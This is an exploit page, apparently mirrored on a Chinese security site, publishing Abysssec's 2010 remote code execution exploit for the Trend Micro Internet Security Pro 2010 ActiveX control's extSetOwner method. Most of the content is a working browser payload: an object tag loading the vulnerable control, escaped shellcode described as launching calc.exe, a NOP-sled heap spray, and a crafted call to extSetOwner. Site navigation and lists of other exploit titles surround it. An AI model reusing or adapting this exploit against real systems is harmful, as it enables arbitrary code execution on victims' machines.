首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Trend Micro Internet Security Pro 2010 extSetOwner Code Execution 来源：http://www.abysssec.com 作者：Abysssec 发布时间：2010-09-06   Title            :  Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code  Execution   Version          :  UfPBCtrl.DLL  17.50.0.1366 (XP SP3)   Analysis         :  http://www.abysssec.com   Vendor           :  http://www.trendmicro.com   Impact           :  Critical   Contact          :  shahin [at] abysssec.com , info  [at] abysssec.com   Twitter          :  @abysssec     http://www.exploit-db.com/trend-micro-internet-security-pro-2010-activex-extsetowner-remote-code-execution/   SHELLCODE CALC.EXE TESTED ON XPSP3_IE_7 --> <object ID='target' classid='clsid:15DBC3F9-9F0A-472E-8061-043D9CEC52F0'> </object> <script>       shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+                     '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+                     '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+                     '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+                     '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+                     '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+                     '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+                     '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');                             nops=unescape('%u9090%u9090');      headersize =20;      slackspace= headersize + shellcode.length;      while(nops.length< slackspace) nops+= nops;      fillblock= nops.substring(0, slackspace);      block= nops.substring(0, nops.length- slackspace);      while( block.length+ slackspace<0x50000) block= block+ block+ fillblock;      memory=new Array();      for( counter=0; counter<200; counter++) memory[counter]= block + shellcode;          target.extSetOwner(unescape('%ua5de%u3da6'));                 //mshtml.dll [0x3DA6A5DE] = 0A0A0A06       </script>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·win32/xp Checksum Routine shel ·Windows Media Player 11 DLL Hi ·Virtual DJ Trial v6.1.2 SEH Bu ·SMF 2.0 RC3 - Denial Of Servic ·Linux/ARM - execve("/bin/sh", ·phpBB 3.0.7-PL1 - Denial Of Se ·FCrackZip 1.0 Local Buffer Ove ·Microsoft MPEG Layer-3 Remote ·A-Blog v2.0 (sources/search.ph ·VLC Media Player < 1.1.4 (.xsp ·myBB 1.0.6 Denial of Service E ·mBlogger 1.0.04 (addcomment.ph   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved